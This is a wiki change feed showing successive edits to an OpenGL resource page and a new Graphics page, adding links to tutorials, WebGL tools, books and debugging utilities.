# No signed or unsigned ints, only floats. (But see the new [https://developer.mozilla.org/en/JavaScript_typed_arrays typed arrays] support)
 
# Traditionally had no byte type. (But see the new [https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array Uint8Array], [http://www.html5rocks.com/en/tutorials/file/xhr2/#toc-reponseTypeArrayBuffer ArrayBuffer from XMLHttpRequest])
 
# Traditionally had no byte type. (But see the new [https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array Uint8Array], [http://www.html5rocks.com/en/tutorials/file/xhr2/#toc-reponseTypeArrayBuffer ArrayBuffer from XMLHttpRequest])

by Scott.tsai at February 22, 2016 11:10 PM

OpenGL

← Older revision Revision as of 21:55, 22 February 2016
(3 intermediate revisions by one user not shown)
Line 1: Line 1:
 
== Tutorials ==
 
== Tutorials ==
 +
* [http://pixelshaders.com/ Pixel Shaders] An Interactive Introduction to Graphics Programming by Toby Schachman
 +
* [http://webglfundamentals.org/ WebGL Fundamentals]
 +
* [http://learnopengl.com/ Learn OpenGL (learnopengl.com)]
 +
* [http://www.opengl-tutorial.org/ opengl-tutorial.org]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
 
* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
Line 5: Line 9:
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 +
* [http://www.tomdalling.com/blog/category/modern-opengl/ Tom Dalling's Modern OpenGL Series]
 +
* [http://www.codeproject.com/Articles/771225/Learning-Modern-OpenGL Learning Modern OpenGL]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead Approaching zero driver overhead]
+
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead AZDO: Approaching zero driver overhead]
 +
 
 +
== Courses ==
 +
* [https://www.udacity.com/courses/cs291 Udacity CS291: nteractive 3D Graphics]
 +
 
 +
== Blogs ==
 +
* [http://www.realtimerendering.com/blog/ Real-Time Rendering] by Ed Angel
  
 
== WebGL ==
 
== WebGL ==
Line 15: Line 27:
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
* [http://webglstats.com/ WebGL Stats]
+
* Device support statistics: [http://webglstats.com/ WebGL Stats]
 +
* [http://webglreport.com/?v=1 WebGL Report]
 +
* [http://www.realtimerendering.com/blog/webgl-debugging-and-profiling-tools/ WebGL Debugging and Profiling Tools]
 +
* [http://webglworkshop.com/presentations/Workshop18-MakeGreat.html#/ Practical Learnings of WebGL for Make Benefit Glorious Internet of Web], Oct 2015
 +
* [https://github.com/unconed/mathbox Mathbox]: presentation-quality math diagrams and animations in WebGL
 +
* Presentation Editor: http://fhtr.org/editor/
 +
 
 +
== Sample Code ==
 +
* [http://www.g-truc.net/project-0026.html OpenGL Samples Pack]: use FreeGLUT to create window and an OpenGL context, GLEW to load OpenGL implementations, GLM as math library and to replace OpenGL fixed pipeline functions and GLI to load images.
  
 
== Mobile / Embedded ==
 
== Mobile / Embedded ==
Line 29: Line 49:
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
  
== References ==
+
== Version Supprt ==
 +
* [https://developer.apple.com/opengl/capabilities/ Mac OSX OpenGL Capabilities]
 +
 
 +
== Books ==
 +
* [http://www.amazon.com/Real-Time-Rendering-Third-Tomas-Akenine-Mo-ller-ebook/dp/B007COYODQReal-Time Rendering, 3rd Edition] by Tomas Akenine-Mo¨ller
 +
* [http://www.amazon.com/gp/product/0321399528/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0321399528&linkCode=as2&tag=bfextcodeproj-20&linkId=LKAAHY6YZCRMH57I Computer Graphics: Principles and Practice 3rd Edition]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
  
Line 36: Line 61:
  
 
== Tools ==
 
== Tools ==
 +
* [https://github.com/google/ion Google Ion]: analyze grpahics scenes, trace OpenGL calls, run-time graphics state introspection and shader editing
 +
* [https://github.com/ValveSoftware/vogl vogl]: OpenGL capture / playback debugger
 
* [https://github.com/apitrace/apitrace ApiTrace]: trace OpenGL, D3D9, D3D8, D3D7, and DDRAW APIs calls to a file
 
* [https://github.com/apitrace/apitrace ApiTrace]: trace OpenGL, D3D9, D3D8, D3D7, and DDRAW APIs calls to a file
 
** retrace OpenGL calls from a file
 
** retrace OpenGL calls from a file
Line 43: Line 70:
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 +
* [http://synthclipse.sourceforge.net Sythclipse]: shader authoring environment
 +
 +
== See Also ==
 +
* [[Graphics]]

by Scott.tsai at February 22, 2016 09:55 PM

OpenGL

← Older revision Revision as of 04:57, 22 February 2016
(One intermediate revision by one user not shown)
Line 1: Line 1:
 
== Tutorials ==
 
== Tutorials ==
 +
* [http://pixelshaders.com/ Pixel Shaders] An Interactive Introduction to Graphics Programming by Toby Schachman
 +
* [http://webglfundamentals.org/ WebGL Fundamentals]
 +
* [http://learnopengl.com/ Learn OpenGL (learnopengl.com)]
 +
* [http://www.opengl-tutorial.org/ opengl-tutorial.org]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
 
* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
Line 5: Line 9:
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 +
* [http://www.tomdalling.com/blog/category/modern-opengl/ Tom Dalling's Modern OpenGL Series]
 +
* [http://www.codeproject.com/Articles/771225/Learning-Modern-OpenGL Learning Modern OpenGL]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead Approaching zero driver overhead]
+
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead AZDO: Approaching zero driver overhead]
 +
 
 +
== Courses ==
 +
* [https://www.udacity.com/courses/cs291 Udacity CS291]
  
 
== WebGL ==
 
== WebGL ==
Line 15: Line 24:
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
* [http://webglstats.com/ WebGL Stats]
+
* Device support statistics: [http://webglstats.com/ WebGL Stats]
 +
* [http://webglworkshop.com/presentations/Workshop18-MakeGreat.html#/ Practical Learnings of WebGL for Make Benefit Glorious Internet of Web], Oct 2015
 +
* [https://github.com/unconed/mathbox Mathbox]: presentation-quality math diagrams and animations in WebGL
 +
* Presentation Editor: http://fhtr.org/editor/
 +
 
 +
 
 +
== Sample Code ==
 +
* [http://www.g-truc.net/project-0026.html OpenGL Samples Pack]: use FreeGLUT to create window and an OpenGL context, GLEW to load OpenGL implementations, GLM as math library and to replace OpenGL fixed pipeline functions and GLI to load images.
  
 
== Mobile / Embedded ==
 
== Mobile / Embedded ==
Line 29: Line 45:
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
  
== References ==
+
== Version Supprt ==
 +
* [https://developer.apple.com/opengl/capabilities/ Mac OSX OpenGL Capabilities]
 +
 
 +
== Books ==
 +
* [http://www.amazon.com/Real-Time-Rendering-Third-Tomas-Akenine-Mo-ller-ebook/dp/B007COYODQReal-Time Rendering, 3rd Edition] by Tomas Akenine-Mo¨ller
 +
* [http://www.amazon.com/gp/product/0321399528/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0321399528&linkCode=as2&tag=bfextcodeproj-20&linkId=LKAAHY6YZCRMH57I Computer Graphics: Principles and Practice 3rd Edition]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
  
Line 36: Line 57:
  
 
== Tools ==
 
== Tools ==
 +
* [https://github.com/google/ion Google Ion]: analyze grpahics scenes, trace OpenGL calls, run-time graphics state introspection and shader editing
 +
* [https://github.com/ValveSoftware/vogl vogl]: OpenGL capture / playback debugger
 
* [https://github.com/apitrace/apitrace ApiTrace]: trace OpenGL, D3D9, D3D8, D3D7, and DDRAW APIs calls to a file
 
* [https://github.com/apitrace/apitrace ApiTrace]: trace OpenGL, D3D9, D3D8, D3D7, and DDRAW APIs calls to a file
 
** retrace OpenGL calls from a file
 
** retrace OpenGL calls from a file
Line 43: Line 66:
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 +
* [http://synthclipse.sourceforge.net Sythclipse]: shader authoring environment
 +
 +
== See Also ==
 +
* [[Graphics]]

by Scott.tsai at February 22, 2016 04:57 AM

OpenGL

← Older revision Revision as of 04:03, 22 February 2016
Line 1: Line 1:
 
== Tutorials ==
 
== Tutorials ==
 +
* [http://pixelshaders.com/ Pixel Shaders] An Interactive Introduction to Graphics Programming by Toby Schachman
 +
* [http://webglfundamentals.org/ WebGL Fundamentals]
 +
* [http://learnopengl.com/ Learn OpenGL (learnopengl.com)]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://notes.underscorediscovery.com/shaders-a-primer/ Primer : Shaders]
 
* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
 
* [http://learningwebgl.com/blog/?page_id=1217 Learning WebGL tutorials] ([https://github.com/gpjt/webgl-lessons source])([http://games.greggman.com/game/webgl-fundamentals/ WebGL Fundamentals (WebGL is a 2D API!)], [https://developer.mozilla.org/en/WebGL mozilla: WebGL])
Line 5: Line 8:
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 +
* [http://www.codeproject.com/Articles/771225/Learning-Modern-OpenGL Learning Modern OpenGL]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead Approaching zero driver overhead]
+
* '''Performance''': [http://www.slideshare.net/CassEveritt/approaching-zero-driver-overhead AZDO: Approaching zero driver overhead]
 +
 
 +
== Courses ==
 +
* [https://www.udacity.com/courses/cs291 Udacity CS291]
  
 
== WebGL ==
 
== WebGL ==
Line 15: Line 22:
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://benvanik.github.com/WebGL-Inspector/ WebGL Inspector]: step through WebGL calls or just draw calls, and view textures, buffers, shaders, and the current state – think gDEBugger for WebGL.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
 
* [http://analyticalgraphicsinc.github.com/webglreport/ WebGL Report]: shows a pipeline diagram of the system’s WebGL capabilities such as maximum texture size and number of texture image units.
* [http://webglstats.com/ WebGL Stats]
+
* Device support statistics: [http://webglstats.com/ WebGL Stats]
 +
* Presentation Editor: http://fhtr.org/editor/
 +
* [http://webglworkshop.com/presentations/Workshop18-MakeGreat.html#/ Practical Learnings of WebGL for Make Benefit Glorious Internet of Web], Oct 2015
  
 
== Mobile / Embedded ==
 
== Mobile / Embedded ==
Line 29: Line 38:
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
 
* [http://code.google.com/p/angleproject ANGLE: "allow Windows users to seamlessly run WebGL content by translating OpenGL ES 2.0 API calls to DirectX 9 API calls"]: used by Google Chrome and WINE
  
== References ==
+
== Version Supprt ==
 +
* [https://developer.apple.com/opengl/capabilities/ Mac OSX OpenGL Capabilities]
 +
 
 +
== Books ==
 +
* [http://www.amazon.com/Real-Time-Rendering-Third-Tomas-Akenine-Mo-ller-ebook/dp/B007COYODQReal-Time Rendering, 3rd Edition] by Tomas Akenine-Mo¨ller
 +
* [http://www.amazon.com/gp/product/0321399528/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=0321399528&linkCode=as2&tag=bfextcodeproj-20&linkId=LKAAHY6YZCRMH57I Computer Graphics: Principles and Practice 3rd Edition]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
 
* red book: [http://www.opengl.org/documentation/red_book/ OpenGL Programming Guide]
  
Line 43: Line 57:
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [http://cgit.freedesktop.org/piglit/ Piglit OpenGL testsuite used by MESA] ([http://lists.freedesktop.org/mailman/listinfo/piglit mailing list])
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 
* [https://github.com/anholt/libepoxy libepoxy] OpenGL extension and window system function pointer management for Linux, Mac OS and Windows. Originally by Eric Anholt.
 +
 +
== See Also ==
 +
* [[Graphics]]

by Scott.tsai at February 22, 2016 04:03 AM

Graphics

Created page with "* [http://intothecontinuum.tumblr.com/ Into the Continuum]: Mathematica code and animations == See Also == * OpenGL"

New page

* [http://intothecontinuum.tumblr.com/ Into the Continuum]: Mathematica code and animations

== See Also ==
* [[OpenGL]]

by Scott.tsai at February 22, 2016 03:58 AM

OpenGL

← Older revision Revision as of 02:32, 22 February 2016
Line 4: Line 4:
 
* [http://blogoben.wordpress.com/webgl-basics/ WebGL Basics - The Blog-o-Ben]
 
* [http://blogoben.wordpress.com/webgl-basics/ WebGL Basics - The Blog-o-Ben]
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
 
* [http://duriansoftware.com/joe/An-intro-to-modern-OpenGL.-Table-of-Contents.html An intro to modern OpenGL by Joe Groff] ([https://github.com/jckarter/hello-gl source])
* [http://www.arcsynthesis.org/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
+
* [http://opengl.datenwolf.net/gltut/ Learning Modern 3D Graphics Programming by Jason L. McKesson] ([https://bitbucket.org/alfonse/gltut/overview source]) ([https://bitbucket.org/tartley/gltutpy python translation])
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://en.wikibooks.org/wiki/OpenGL_Programming WikiBooks: OpenGL Programming]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]
 
* [http://pyopengl.sourceforge.net/context/tutorials/index.xhtml Python OpenGLContext Tutorials]

by Scott.tsai at February 22, 2016 02:32 AM